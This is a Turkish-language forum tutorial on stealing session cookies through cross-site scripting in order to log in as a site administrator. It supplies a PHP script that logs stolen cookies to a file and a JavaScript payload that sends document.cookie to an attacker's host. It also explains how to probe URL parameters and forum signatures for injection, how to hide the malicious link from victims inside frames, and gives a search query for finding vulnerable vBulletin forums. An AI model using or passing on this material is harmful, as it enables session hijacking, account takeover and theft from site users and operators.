Cookie Nedir?
Cookie nedir ilk önce bunu tanımlayalım örneklerle;Cookie bizi sitelerde kimliğimizi belirlemeye yarıyan .txt dosyalarıdır.Örneğin bir siteye üye oluruz ve beni hatırla seçeneği olurya bildiğiniz gibi,beni hatırla diyerek login olduğumuzda site Pc'mize bir cookie atar.Bu Cookie ile bizim yöneticimi,usermi olduğumuzu tanımlar yada başka birşey.Örneğin oylamalardada bu şekildede olabilir.Oylamayı atarsınız bakmışsınız Pc'nizde bir Cookie.Bir daha oylama yapmaya kalktığınızda Pcnizdeki Cookie harekete geçerek engelliyecektir.
Ne işimize yarar
Cookie çalmak ne işimize yarar,biz bir user seviyesindeyken bir yöneticinin cookiesini almaya kalkarsak onun cookiesi üst seviye olacağından bizimkisi ile değişince doğal olarak biz admin olarak girmiş oluruz ve yapıcağımızı yaparız.
Cookieyi nasıl çalarız?
-Açığın olduğu alan tespit edilir; Açığın olduğu alanı bulmak için örneğin forumlarda html/java yiyen bölgelere deneme yapılır çeşitli kodlarla.İmza altına atarak olabilir,çeşitli türlerde olabilir.
En azından şunu deniyebilirsiniz; javascript:alert(document·cookie); Bu kod Javascript dilinde alert uyarı demek ,cookie parametresi ile birleşince o anki cookieni ekrana yansıtır sadece seninkini tabi.Baktın oluyor daha tehlikelisin denersin.
-Bir script ile Cookienin loglanması sağlanır;Aşağıda Cookieyi çalmak için gerekli scripti yazacağız.
-Açığın olduğu yere bir script enjekte edilir;Cookie bilgisini gönderecek alert gibi
-Kurbanın o Url'ye veya sayfaya bir şekilde girmesi sağlanır;Direk link veremieğinize göre(yasaksa veririz) bir frame içinde olabilir çeşitli yollarla deniyebilirsiniz.Hele forum gibi alanlarda direk verirsiniz görünmez çünki.
Uygulamaya geçelim..
Kod:
şfilename = getcwd()."\\loglarburada.txt";
if(!file_exists(şfilename)){
touch(şfilename);
chmod(şfilename, 0666);
}
if (isset(ş_GET["cookie"]))
{
if (!şhandle = fopen(şfilename, 'a'))
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
else
{
if (fwrite(şhandle, "\r\n" . ş_GET["cookie"]) === FALSE)
{
echo "Hata: Loglar dosyaya yazılamadı!";
exit;
}
}
echo "Log başarıyla girildi...";
fclose(şhandle);
exit;
}
echo "Hani loglayacağımız parametre?";
exit;
?>
Yukarıdaki bir Php scriptimizdir Cookieyi loglamaya yarıyacak.Peki ne diyor scripti loglarburada.txt diye yeni bir .txt belgesi oluştur ve buraya cookieyi yaz diyor.
Cookienin yazılabilmesi için ChMod777 yani yazma izninde olması gerekiyor anlamına gelir.
Cookieyi şu parametre ile alacağız;
Kod:
window.navigate("http://xx.com/cookie.php?cookie="+document·cookie)
Nasılmı dediğinizi duyuyorum,biraz örneklere geçelim.
Şimid mesela bir sitede denemeler yapıyoruz örneğin haber sayfası diyelim şu şekilde bir url war xx.com/haberdetay.asp?id=1
Ewt biz bunu ;
xx.com/haberdetay.asp?id=javascript:alert(documen t.cookie);
Şu şekilde bir kontrol ettiririz bakalım <; gibi taglar yasaklanmışmı diye ekranda cookie gösteriyorsa denememizi yapabiliriz.
Yanlız timeouttanda script düşebilir,kesin çalışacak die birşey yok.
E buldukta napıcağız biz bunu,bir frame içinde kurbanı çaktırmadan bu urlye sokacaksınız hangi urlye?Xss yedirdiğiniz yere yani;
Kod:
xx.com/haberdetay.asp?id=window.navigate("http://xx.com/cookie.php?cookie="+document·cookie)
HTML Acık Vbulletinlerdede Cookie CekebiLirsiniz
Kod:
http://www.google.com.tr/search?hl=tr&q=intext%3A%22HTML+code+is+On%22+inur l%3Ashowthread.php&btnG=Ara&meta=